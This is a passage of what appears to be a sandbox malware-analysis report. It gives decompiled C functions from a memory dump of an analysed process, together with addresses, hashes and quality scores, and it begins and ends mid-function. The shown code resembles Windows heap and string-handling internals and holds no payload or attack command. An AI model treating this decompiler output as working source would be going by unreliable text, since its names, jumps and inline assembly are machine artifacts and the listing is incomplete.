                                                                                                            								 *((short*)(_t107 + 6)) = 0x14d5;
                                                                                                            								_t47 = _t107 + 0x24; // 0x24
                                                                                                            								_t177 = _t47;
                                                                                                            								E010E6B4C( &_v36, _t177, 0xc78,  &_v8);
                                                                                                            								_t51 = _v8 + 4; // 0x4
                                                                                                            								_t178 = _t177 + (_v8 >> 1) * 2;
                                                                                                            								_v12 = _t51;
                                                                                                            								E010E6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                                                                            								_v12 = _v12 + _v8;
                                                                                                            								E010E6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                                                                            								_t125 = _v8;
                                                                                                            								_v12 = _v12 + _v8;
                                                                                                            								E010E6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                                                                                                            								_t174 = _v12 + _v8;
                                                                                                            								if(E01087D50() != 0) {
                                                                                                            									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                            								}
                                                                                                            								_push(_v16);
                                                                                                            								_push(_t174);
                                                                                                            								_push(0x402);
                                                                                                            								_push( *_t137 & 0x000000ff);
                                                                                                            								E010A9AE0();
                                                                                                            								L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                                                                                                            								_t168 = _v20;
                                                                                                            							}
                                                                                                            							_t87 = L01082400( &_v36);
                                                                                                            							if(_v24 >= 0) {
                                                                                                            								_t87 = L01082400( &_v44);
                                                                                                            							}
                                                                                                            							if(_t168 >= 0) {
                                                                                                            								_t87 = L01082400( &_v52);
                                                                                                            							}
                                                                                                            							if(_v28 >= 0) {
                                                                                                            								return L01082400( &_v60);
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t87;
                                                                                                            			}































                                                                                                            0x010e6eab
                                                                                                            0x010e6eac
                                                                                                            0x010e6eb3
                                                                                                            0x010e6ecd
                                                                                                            0x010e6edc
                                                                                                            0x010e6ee2
                                                                                                            0x010e6ee5
                                                                                                            0x010e6ef2
                                                                                                            0x010e6efb
                                                                                                            0x010e6f01
                                                                                                            0x010e6f06
                                                                                                            0x010e6f0b
                                                                                                            0x010e6f11
                                                                                                            0x010e6f1a
                                                                                                            0x010e6f22
                                                                                                            0x010e6f26
                                                                                                            0x010e6f26
                                                                                                            0x010e6f33
                                                                                                            0x010e6f41
                                                                                                            0x010e6f44
                                                                                                            0x010e6f47
                                                                                                            0x010e6f54
                                                                                                            0x010e6f65
                                                                                                            0x010e6f77
                                                                                                            0x010e6f7c
                                                                                                            0x010e6f82
                                                                                                            0x010e6f91
                                                                                                            0x010e6f99
                                                                                                            0x010e6fa3
                                                                                                            0x010e6fae
                                                                                                            0x010e6fae
                                                                                                            0x010e6fba
                                                                                                            0x010e6fbb
                                                                                                            0x010e6fbc
                                                                                                            0x010e6fc1
                                                                                                            0x010e6fc2
                                                                                                            0x010e6fd3
                                                                                                            0x010e6fd8
                                                                                                            0x010e6fd8
                                                                                                            0x010e6fdf
                                                                                                            0x010e6fe8
                                                                                                            0x010e6fee
                                                                                                            0x010e6fee
                                                                                                            0x010e6ff5
                                                                                                            0x010e6ffb
                                                                                                            0x010e6ffb
                                                                                                            0x010e7004
                                                                                                            0x00000000
                                                                                                            0x010e700a
                                                                                                            0x010e7004
                                                                                                            0x010e6eb3
                                                                                                            0x010e6e9c
                                                                                                            0x010e7015

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                            • Instruction ID: 0e47cff1c421aafe60f9849041827344452a5bf443a35b611bf572f2cdbb82f8
                                                                                                            • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                            • Instruction Fuzzy Hash: B9718071A0061AEFCB11EFA9C944AEEBBF9FF58700F104469E544E7250DB30AA41CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 78%
                                                                                                            			E010652A5(char __ecx) {
                                                                                                            				char _v20;
                                                                                                            				char _v28;
                                                                                                            				char _v29;
                                                                                                            				void* _v32;
                                                                                                            				void* _v36;
                                                                                                            				void* _v37;
                                                                                                            				void* _v38;
                                                                                                            				void* _v40;
                                                                                                            				void* _v46;
                                                                                                            				void* _v64;
                                                                                                            				void* __ebx;
                                                                                                            				intOrPtr* _t49;
                                                                                                            				signed int _t53;
                                                                                                            				short _t85;
                                                                                                            				signed int _t87;
                                                                                                            				signed int _t88;
                                                                                                            				signed int _t89;
                                                                                                            				intOrPtr _t101;
                                                                                                            				intOrPtr* _t102;
                                                                                                            				intOrPtr* _t104;
                                                                                                            				signed int _t106;
                                                                                                            				void* _t108;
                                                                                                            
                                                                                                            				_t93 = __ecx;
                                                                                                            				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                                                                                            				_push(_t88);
                                                                                                            				_v29 = __ecx;
                                                                                                            				_t89 = _t88 | 0xffffffff;
                                                                                                            				while(1) {
                                                                                                            					E0107EEF0(0x11579a0);
                                                                                                            					_t104 =  *0x1158210; // 0xc02bf0
                                                                                                            					if(_t104 == 0) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					asm("lock inc dword [esi]");
                                                                                                            					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                                                                                            					E0107EB70(_t93, 0x11579a0);
                                                                                                            					if( *((char*)(_t108 + 0xf)) != 0) {
                                                                                                            						_t101 =  *0x7ffe02dc;
                                                                                                            						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                                                            						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                                                                                            							L9:
                                                                                                            							_push(0);
                                                                                                            							_push(0);
                                                                                                            							_push(0);
                                                                                                            							_push(0);
                                                                                                            							_push(0x90028);
                                                                                                            							_push(_t108 + 0x20);
                                                                                                            							_push(0);
                                                                                                            							_push(0);
                                                                                                            							_push(0);
                                                                                                            							_push( *((intOrPtr*)(_t104 + 4)));
                                                                                                            							_t53 = E010A9890();
                                                                                                            							__eflags = _t53;
                                                                                                            							if(_t53 >= 0) {
                                                                                                            								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                                                            								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                                                                                            									E0107EEF0(0x11579a0);
                                                                                                            									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                                                                                            									E0107EB70(0, 0x11579a0);
                                                                                                            								}
                                                                                                            								goto L3;
                                                                                                            							}
                                                                                                            							__eflags = _t53 - 0xc0000012;
                                                                                                            							if(__eflags == 0) {
                                                                                                            								L12:
                                                                                                            								_t13 = _t104 + 0xc; // 0xc02bfd
                                                                                                            								_t93 = _t13;
                                                                                                            								 *((char*)(_t108 + 0x12)) = 0;
                                                                                                            								__eflags = E0109F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                                                                            								if(__eflags >= 0) {
                                                                                                            									L15:
                                                                                                            									_t102 = _v28;
                                                                                                            									 *_t102 = 2;
                                                                                                            									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                                                            									E0107EEF0(0x11579a0);
                                                                                                            									__eflags =  *0x1158210 - _t104; // 0xc02bf0
                                                                                                            									if(__eflags == 0) {
                                                                                                            										__eflags =  *((char*)(_t108 + 0xe));
                                                                                                            										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                                                                                            										 *0x1158210 = _t102;
                                                                                                            										_t32 = _t102 + 0xc; // 0x0
                                                                                                            										 *_t95 =  *_t32;
                                                                                                            										_t33 = _t102 + 0x10; // 0x0
                                                                                                            										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                                                                                            										_t35 = _t102 + 4; // 0xffffffff
                                                                                                            										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                                                                                            										if(__eflags != 0) {
                                                                                                            											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                                                                                            											E010E4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                                                                                            										}
                                                                                                            										E0107EB70(_t95, 0x11579a0);
                                                                                                            										asm("lock xadd [esi], eax");
                                                                                                            										if(__eflags == 0) {
                                                                                                            											_push( *((intOrPtr*)(_t104 + 4)));
                                                                                                            											E010A95D0();
                                                                                                            											L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                                                            											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                                                            										}
                                                                                                            										asm("lock xadd [esi], ebx");
                                                                                                            										__eflags = _t89 == 1;
                                                                                                            										if(_t89 == 1) {
                                                                                                            											_push( *((intOrPtr*)(_t104 + 4)));
                                                                                                            											E010A95D0();
                                                                                                            											L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                                                            											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                                                            										}
                                                                                                            										_t49 = _t102;
                                                                                                            										L4:
                                                                                                            										return _t49;
                                                                                                            									}
                                                                                                            									E0107EB70(_t93, 0x11579a0);
                                                                                                            									asm("lock xadd [esi], eax");
                                                                                                            									if(__eflags == 0) {
                                                                                                            										_push( *((intOrPtr*)(_t104 + 4)));
                                                                                                            										E010A95D0();
                                                                                                            										L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                                                            										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                                                            									}
                                                                                                            									 *_t102 = 1;
                                                                                                            									asm("lock xadd [edi], eax");
                                                                                                            									if(__eflags == 0) {
                                                                                                            										_t28 = _t102 + 4; // 0xffffffff
                                                                                                            										_push( *_t28);
                                                                                                            										E010A95D0();
                                                                                                            										L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                                                                                            									}
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								_t93 =  &_v20;
                                                                                                            								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                                                                                            								_t85 = 6;
                                                                                                            								_v20 = _t85;
                                                                                                            								_t87 = E0109F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                                                                            								__eflags = _t87;
                                                                                                            								if(_t87 < 0) {
                                                                                                            									goto L3;
                                                                                                            								}
                                                                                                            								 *((char*)(_t108 + 0xe)) = 1;
                                                                                                            								goto L15;
                                                                                                            							}
                                                                                                            							__eflags = _t53 - 0xc000026e;
                                                                                                            							if(__eflags != 0) {
                                                                                                            								goto L3;
                                                                                                            							}
                                                                                                            							goto L12;
                                                                                                            						}
                                                                                                            						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                                                                                            						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                                                                                            							goto L3;
                                                                                                            						} else {
                                                                                                            							goto L9;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					L3:
                                                                                                            					_t49 = _t104;
                                                                                                            					goto L4;
                                                                                                            				}
                                                                                                            				_t49 = 0;
                                                                                                            				goto L4;
                                                                                                            			}


                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2bb6ce1745b79afebf82c9447fabd7ee521e59f0bb33fc4b65365c21dd890568
                                                                                                            • Instruction ID: 0e527e01e6659d076ebcb7dd8d5ab9b0543d161955ed2b4fea00eea14a3e5e89
                                                                                                            • Opcode Fuzzy Hash: 2bb6ce1745b79afebf82c9447fabd7ee521e59f0bb33fc4b65365c21dd890568
                                                                                                            • Instruction Fuzzy Hash: 1B51A971205342EBD721EF68C842B6BBBE8BF94B54F14095EF4E587651E770E840CBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E01092AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                                                                                                            				signed short* _v8;
                                                                                                            				signed short* _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				intOrPtr* _v28;
                                                                                                            				signed int _v32;
                                                                                                            				signed int _v36;
                                                                                                            				short _t56;
                                                                                                            				signed int _t57;
                                                                                                            				intOrPtr _t58;
                                                                                                            				signed short* _t61;
                                                                                                            				intOrPtr _t72;
                                                                                                            				intOrPtr _t75;
                                                                                                            				intOrPtr _t84;
                                                                                                            				intOrPtr _t87;
                                                                                                            				intOrPtr* _t90;
                                                                                                            				signed short* _t91;
                                                                                                            				signed int _t95;
                                                                                                            				signed short* _t96;
                                                                                                            				intOrPtr _t97;
                                                                                                            				intOrPtr _t102;
                                                                                                            				signed int _t108;
                                                                                                            				intOrPtr _t110;
                                                                                                            				signed int _t111;
                                                                                                            				signed short* _t112;
                                                                                                            				void* _t113;
                                                                                                            				signed int _t116;
                                                                                                            				signed short** _t119;
                                                                                                            				short* _t120;
                                                                                                            				signed int _t123;
                                                                                                            				signed int _t124;
                                                                                                            				void* _t125;
                                                                                                            				intOrPtr _t127;
                                                                                                            				signed int _t128;
                                                                                                            
                                                                                                            				_t90 = __ecx;
                                                                                                            				_v16 = __edx;
                                                                                                            				_t108 = _a4;
                                                                                                            				_v28 = __ecx;
                                                                                                            				_t4 = _t108 - 1; // -1
                                                                                                            				if(_t4 > 0x13) {
                                                                                                            					L15:
                                                                                                            					_t56 = 0xc0000100;
                                                                                                            					L16:
                                                                                                            					return _t56;
                                                                                                            				}
                                                                                                            				_t57 = _t108 * 0x1c;
                                                                                                            				_v32 = _t57;
                                                                                                            				_t6 = _t57 + 0x1158204; // 0x0
                                                                                                            				_t123 =  *_t6;
                                                                                                            				_t7 = _t57 + 0x1158208; // 0x1158207
                                                                                                            				_t8 = _t57 + 0x1158208; // 0x1158207
                                                                                                            				_t119 = _t8;
                                                                                                            				_v36 = _t123;
                                                                                                            				_t110 = _t7 + _t123 * 8;
                                                                                                            				_v24 = _t110;
                                                                                                            				_t111 = _a4;
                                                                                                            				if(_t119 >= _t110) {
                                                                                                            					L12:
                                                                                                            					if(_t123 != 3) {
                                                                                                            						_t58 =  *0x1158450; // 0x0
                                                                                                            						if(_t58 == 0) {
                                                                                                            							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t26 = _t57 + 0x115821c; // 0x0
                                                                                                            						_t58 =  *_t26;
                                                                                                            					}
                                                                                                            					 *_t90 = _t58;
                                                                                                            					goto L15;
                                                                                                            				} else {
                                                                                                            					goto L2;
                                                                                                            				}
                                                                                                            				while(1) {
                                                                                                            					_t116 =  *_t61 & 0x0000ffff;
                                                                                                            					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                                                                            					if(_t116 == _t128) {
                                                                                                            						goto L18;
                                                                                                            					}
                                                                                                            					L5:
                                                                                                            					if(_t116 >= 0x61) {
                                                                                                            						if(_t116 > 0x7a) {
                                                                                                            							_t97 =  *0x1156d5c; // 0x7fb40654
                                                                                                            							_t72 =  *0x1156d5c; // 0x7fb40654
                                                                                                            							_t75 =  *0x1156d5c; // 0x7fb40654
                                                                                                            							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                                                                                                            						} else {
                                                                                                            							_t116 = _t116 - 0x20;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if(_t128 >= 0x61) {
                                                                                                            						if(_t128 > 0x7a) {
                                                                                                            							_t102 =  *0x1156d5c; // 0x7fb40654
                                                                                                            							_t84 =  *0x1156d5c; // 0x7fb40654
                                                                                                            							_t87 =  *0x1156d5c; // 0x7fb40654
                                                                                                            							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                                                                                                            						} else {
                                                                                                            							_t128 = _t128 - 0x20;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if(_t116 == _t128) {
                                                                                                            						_t61 = _v12;
                                                                                                            						_t96 = _v8;
                                                                                                            					} else {
                                                                                                            						_t113 = _t116 - _t128;
                                                                                                            						L9:
                                                                                                            						_t111 = _a4;
                                                                                                            						if(_t113 == 0) {
                                                                                                            							_t115 =  &(( *_t119)[_t111 + 1]);
                                                                                                            							_t33 =  &(_t119[1]); // 0x100
                                                                                                            							_t120 = _a8;
                                                                                                            							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                                                                                                            							_t35 = _t95 - 1; // 0xff
                                                                                                            							_t124 = _t35;
                                                                                                            							if(_t120 == 0) {
                                                                                                            								L27:
                                                                                                            								 *_a16 = _t95;
                                                                                                            								_t56 = 0xc0000023;
                                                                                                            								goto L16;
                                                                                                            							}
                                                                                                            							if(_t124 >= _a12) {
                                                                                                            								if(_a12 >= 1) {
                                                                                                            									 *_t120 = 0;
                                                                                                            								}
                                                                                                            								goto L27;
                                                                                                            							}
                                                                                                            							 *_a16 = _t124;
                                                                                                            							_t125 = _t124 + _t124;
                                                                                                            							E010AF3E0(_t120, _t115, _t125);
                                                                                                            							_t56 = 0;
                                                                                                            							 *((short*)(_t125 + _t120)) = 0;
                                                                                                            							goto L16;
                                                                                                            						}
                                                                                                            						_t119 =  &(_t119[2]);
                                                                                                            						if(_t119 < _v24) {
                                                                                                            							L2:
                                                                                                            							_t91 =  *_t119;
                                                                                                            							_t61 = _t91;
                                                                                                            							_v12 = _t61;
                                                                                                            							_t112 =  &(_t61[_t111]);
                                                                                                            							_v8 = _t112;
                                                                                                            							if(_t61 >= _t112) {
                                                                                                            								break;
                                                                                                            							} else {
                                                                                                            								_t127 = _v16 - _t91;
                                                                                                            								_t96 = _t112;
                                                                                                            								_v20 = _t127;
                                                                                                            								_t116 =  *_t61 & 0x0000ffff;
                                                                                                            								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                                                                            								if(_t116 == _t128) {
                                                                                                            									goto L18;
                                                                                                            								}
                                                                                                            								goto L5;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							_t90 = _v28;
                                                                                                            							_t57 = _v32;
                                                                                                            							_t123 = _v36;
                                                                                                            							goto L12;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					L18:
                                                                                                            					_t61 =  &(_t61[1]);
                                                                                                            					_v12 = _t61;
                                                                                                            					if(_t61 >= _t96) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					_t127 = _v20;
                                                                                                            				}
                                                                                                            				_t113 = 0;
                                                                                                            				goto L9;
                                                                                                            			}







































                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0212c253ed8106a05deb7fad5dab2a659761117a2948afaa627556a525715313
                                                                                                            • Instruction ID: 6f2e63d6229b369e08489e0b440e7a38a8051b53a01be4b5092fa2363e0c32bc
                                                                                                            • Opcode Fuzzy Hash: 0212c253ed8106a05deb7fad5dab2a659761117a2948afaa627556a525715313
                                                                                                            • Instruction Fuzzy Hash: 2E51B276A00119DFCF18DF1DC8A09BDB7F1FB98700715845AE8D69B315D730AA91DB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 86%
                                                                                                            			E0112AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				signed short* _t36;
                                                                                                            				signed int _t41;
                                                                                                            				char* _t42;
                                                                                                            				intOrPtr _t43;
                                                                                                            				signed int _t47;
                                                                                                            				void* _t52;
                                                                                                            				signed int _t57;
                                                                                                            				intOrPtr _t61;
                                                                                                            				signed char _t62;
                                                                                                            				signed int _t72;
                                                                                                            				signed char _t85;
                                                                                                            				signed int _t88;
                                                                                                            
                                                                                                            				_t73 = __edx;
                                                                                                            				_push(__ecx);
                                                                                                            				_t85 = __ecx;
                                                                                                            				_v8 = __edx;
                                                                                                            				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                                                                                                            				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                                                                                                            				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                                                                                                            					_t57 = _t57 | 0x00000001;
                                                                                                            				}
                                                                                                            				_t88 = 0;
                                                                                                            				_t36 = 0;
                                                                                                            				_t96 = _a12;
                                                                                                            				if(_a12 == 0) {
                                                                                                            					_t62 = _a8;
                                                                                                            					__eflags = _t62;
                                                                                                            					if(__eflags == 0) {
                                                                                                            						goto L12;
                                                                                                            					}
                                                                                                            					_t52 = E0112C38B(_t85, _t73, _t57, 0);
                                                                                                            					_t62 = _a8;
                                                                                                            					 *_t62 = _t52;
                                                                                                            					_t36 = 0;
                                                                                                            					goto L11;
                                                                                                            				} else {
                                                                                                            					_t36 = E0112ACFD(_t85, _t73, _t96, _t57, _a8);
                                                                                                            					if(0 == 0 || 0 == 0xffffffff) {
                                                                                                            						_t72 = _t88;
                                                                                                            					} else {
                                                                                                            						_t72 =  *0x00000000 & 0x0000ffff;
                                                                                                            					}
                                                                                                            					 *_a12 = _t72;
                                                                                                            					_t62 = _a8;
                                                                                                            					L11:
                                                                                                            					_t73 = _v8;
                                                                                                            					L12:
                                                                                                            					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                                                                                                            						L19:
                                                                                                            						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                                                                                                            							L22:
                                                                                                            							_t74 = _v8;
                                                                                                            							__eflags = _v8;
                                                                                                            							if(__eflags != 0) {
                                                                                                            								L25:
                                                                                                            								__eflags = _t88 - 2;
                                                                                                            								if(_t88 != 2) {
                                                                                                            									__eflags = _t85 + 0x44 + (_t88 << 6);
                                                                                                            									_t88 = E0112FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                                                                                                            									goto L34;
                                                                                                            								}
                                                                                                            								L26:
                                                                                                            								_t59 = _v8;
                                                                                                            								E0112EA55(_t85, _v8, _t57);
                                                                                                            								asm("sbb esi, esi");
                                                                                                            								_t88 =  ~_t88;
                                                                                                            								_t41 = E01087D50();
                                                                                                            								__eflags = _t41;
                                                                                                            								if(_t41 == 0) {
                                                                                                            									_t42 = 0x7ffe0380;
                                                                                                            								} else {
                                                                                                            									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                            								}
                                                                                                            								__eflags =  *_t42;
                                                                                                            								if( *_t42 != 0) {
                                                                                                            									_t43 =  *[fs:0x30];
                                                                                                            									__eflags =  *(_t43 + 0x240) & 0x00000001;
                                                                                                            									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                                                                                                            										__eflags = _t88;
                                                                                                            										if(_t88 != 0) {
                                                                                                            											E01121608(_t85, _t59, 3);
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            								goto L34;
                                                                                                            							}
                                                                                                            							_push(_t62);
                                                                                                            							_t47 = E01131536(0x1158ae4, (_t74 -  *0x1158b04 >> 0x14) + (_t74 -  *0x1158b04 >> 0x14), _t88, __eflags);
                                                                                                            							__eflags = _t47;
                                                                                                            							if(_t47 == 0) {
                                                                                                            								goto L26;
                                                                                                            							}
                                                                                                            							_t74 = _v12;
                                                                                                            							_t27 = _t47 - 1; // -1
                                                                                                            							_t88 = _t27;
                                                                                                            							goto L25;
                                                                                                            						}
                                                                                                            						_t62 = _t85;
                                                                                                            						if(L0112C323(_t62, _v8, _t57) != 0xffffffff) {
                                                                                                            							goto L22;
                                                                                                            						}
                                                                                                            						_push(_t62);
                                                                                                            						_push(_t88);
                                                                                                            						E0112A80D(_t85, 9, _v8, _t88);
                                                                                                            						goto L34;
                                                                                                            					} else {
                                                                                                            						_t101 = _t36;
                                                                                                            						if(_t36 != 0) {
                                                                                                            							L16:
                                                                                                            							if(_t36 == 0xffffffff) {
                                                                                                            								goto L19;
                                                                                                            							}
                                                                                                            							_t62 =  *((intOrPtr*)(_t36 + 2));
                                                                                                            							if((_t62 & 0x0000000f) == 0) {
                                                                                                            								goto L19;
                                                                                                            							}
                                                                                                            							_t62 = _t62 & 0xf;
                                                                                                            							if(E0110CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                                                                                                            								L34:
                                                                                                            								return _t88;
                                                                                                            							}
                                                                                                            							goto L19;
                                                                                                            						}
                                                                                                            						_t62 = _t85;
                                                                                                            						_t36 = E0112ACFD(_t62, _t73, _t101, _t57, _t62);
                                                                                                            						if(_t36 == 0) {
                                                                                                            							goto L19;
                                                                                                            						}
                                                                                                            						goto L16;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}




















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f52bbaaa4a378400a096f057765d0c8701fb81810cb4ec8f82d61640ddd78654
                                                                                                            • Instruction ID: edf3ec5ca83870ed3d7b97fb118d9ce669610ec1cc260cf06b58a2c24e43529c
                                                                                                            • Opcode Fuzzy Hash: f52bbaaa4a378400a096f057765d0c8701fb81810cb4ec8f82d61640ddd78654
                                                                                                            • Instruction Fuzzy Hash: 104108717007329BD72EDB29E884F3FB799AF84610F044619F92687AD0D738D822C792
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 86%
                                                                                                            			E0108DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                            				char _v5;
                                                                                                            				signed int _v12;
                                                                                                            				signed int* _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				intOrPtr _v32;
                                                                                                            				intOrPtr _v36;
                                                                                                            				intOrPtr _v40;
                                                                                                            				intOrPtr _v44;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				signed int _t54;
                                                                                                            				char* _t58;
                                                                                                            				signed int _t66;
                                                                                                            				intOrPtr _t67;
                                                                                                            				intOrPtr _t68;
                                                                                                            				intOrPtr _t72;
                                                                                                            				intOrPtr _t73;
                                                                                                            				signed int* _t75;
                                                                                                            				intOrPtr _t79;
                                                                                                            				intOrPtr _t80;
                                                                                                            				char _t82;
                                                                                                            				signed int _t83;
                                                                                                            				signed int _t84;
                                                                                                            				signed int _t88;
                                                                                                            				signed int _t89;
                                                                                                            				intOrPtr _t90;
                                                                                                            				intOrPtr _t92;
                                                                                                            				signed int _t97;
                                                                                                            				intOrPtr _t98;
                                                                                                            				intOrPtr* _t99;
                                                                                                            				signed int* _t101;
                                                                                                            				signed int* _t102;
                                                                                                            				intOrPtr* _t103;
                                                                                                            				intOrPtr _t105;
                                                                                                            				signed int _t106;
                                                                                                            				void* _t118;
                                                                                                            
                                                                                                            				_t92 = __edx;
                                                                                                            				_t75 = _a4;
                                                                                                            				_t98 = __ecx;
                                                                                                            				_v44 = __edx;
                                                                                                            				_t106 = _t75[1];
                                                                                                            				_v40 = __ecx;
                                                                                                            				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                                                                                                            					_t82 = 0;
                                                                                                            				} else {
                                                                                                            					_t82 = 1;
                                                                                                            				}
                                                                                                            				_v5 = _t82;
                                                                                                            				_t6 = _t98 + 0xc8; // 0xc9
                                                                                                            				_t101 = _t6;
                                                                                                            				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                                                                                                            				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                                                                                                            				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                                                                                                            				if(_t82 != 0) {
